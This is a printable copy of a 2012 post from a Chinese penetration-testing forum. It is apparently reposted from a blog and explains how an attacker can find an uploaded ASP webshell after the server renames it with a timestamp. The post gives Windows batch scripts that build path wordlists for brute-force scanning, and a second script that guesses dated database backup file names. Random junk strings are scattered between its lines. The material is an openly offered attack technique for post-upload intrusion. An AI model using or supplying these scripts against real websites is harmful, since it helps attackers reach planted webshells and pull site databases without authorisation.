中国网络渗透测试联盟
标题:
针对上传木马找不到名字的解决办法
[打印本页]
作者:
admin
时间:
2012-9-5 15:04
标题:
针对上传木马找不到名字的解决办法
今天在一个人博客里面看到的,地址是:
http://www.0xsec.com/?p=260
- [; V$ y- ~; |1 W( @8 F9 c
# a# S& ~& @& t( [ ~7 E! Z/ c
感觉思路蛮好的,而且在t00ls也没有找到相关文章,我就转过来给大家瞧瞧!
/ z( O/ y3 o0 f
7 L$ k/ c( G, D! h7 g U
——————————————————–
$ P6 W' K' _0 U( s
有时 传了 木马上去后 直接是 xiaoma.asp
4 t' H7 W2 S3 G% s# ?: u/ \# ~
还有种 是按照时间生成名字如201103091**************.asp
' n! _4 g9 M0 f8 ]. x V A e+ Y
下面这种如果又 没有回显的话 就可以做 个字典扫
7 |4 K8 f4 V0 H g
生成字典
' @0 V; \8 | V1 Q
uploadfile/2011/1/1/2011012847000000.asp
% A1 G) q* f1 _+ p ^
uploadfile/2011/1/1/2011012847000001.asp
1 e5 \$ {' @7 e! G! R* U$ W
uploadfile/2011/1/1/2011012847000002.asp
2 K" W2 h2 P( z3 W
uploadfile/2011/1/1/2011012847000003.asp
$ [- C( m9 d6 @" N9 g3 I4 m
uploadfile/2011/1/1/2011012847000004.asp
" s$ }0 C1 Z# D/ x2 F6 ?; x- n, h
——————————————————-
6 T' v1 c1 q3 @: O4 m# i, }
建议只 生成 上传 那1分种左右 如果你电脑 与网站服务器时间差距太大 就 多做点
% I; z& t% C3 B- _& ^
@echo off
4 P8 p5 J1 p& s- s6 [
for %%a in (2011012847) do (
. H' `4 y5 d! M+ c6 V% e, ^
for %%o in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28) do (
8 T, Q1 j0 x6 n# {2 ~- x' a8 l2 N3 c
for %%b in (0 1 2 3 4 5 6 7 8 9) do (
% G$ M0 B; Z9 \' M9 s7 G
for %%c in (0 1 2 3 4 5 6 7 8 9) do (
; C7 V* D$ k) O( h# Y! q3 ^
for %%d in (0 1 2 3 4 5 6 7 8 9) do (
3 t* Z6 X. L1 A' ^, Y0 Q
for %%e in (0 1 2 3 4 5 6 7 8 9) do (
5 ~% W9 ]+ J% s- }
for %%f in (0 1 2 3 4 5 6 7 8 9) do (
1 |' S5 H1 D1 ~# W) R, w/ U6 ~6 q# q- l$ e3 L
for %%g in (0 1 2 3 4 5 6 7 8 9) do (
, f0 _2 z1 d0 N% [) W( O% G* f& o. ~
echo uploadfile/2011/1/%%o/%%a%%b%%c%%d%%e%%f%%g.asp >>data.log
4 X. n' G$ O0 P2 s h) I' j+ g+ Y+ a
))))))))
) \8 R3 [$ h1 S/ t
代码 如上 自己修改即可。 便有了小马的路径。方法不错。值得欣赏。
0 X+ `" a2 b7 w
由此思路修改可以针对数据库备份扫描。
. R% T) a' x! Z6 [
恩不错,还可以写个时间备份数据库文件扫描
$ z6 E! h' P0 u" i' Y2 H. {
@echo off
1 V' f! P' D0 x, N8 e# ]0 {, b1 @
for %%a in (2007 2008 2009 2010) do (
8 L" _4 c3 T1 t$ i$ Y
for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do (
, C- K0 k x* U C+ y; o
for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do (
8 @" @2 [+ \" }" \: A. z7 K8 C) O
echo databackup/%%a-%%b-%%c.mdb >>data.log
- F9 q i. }4 |- F0 i
)))
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2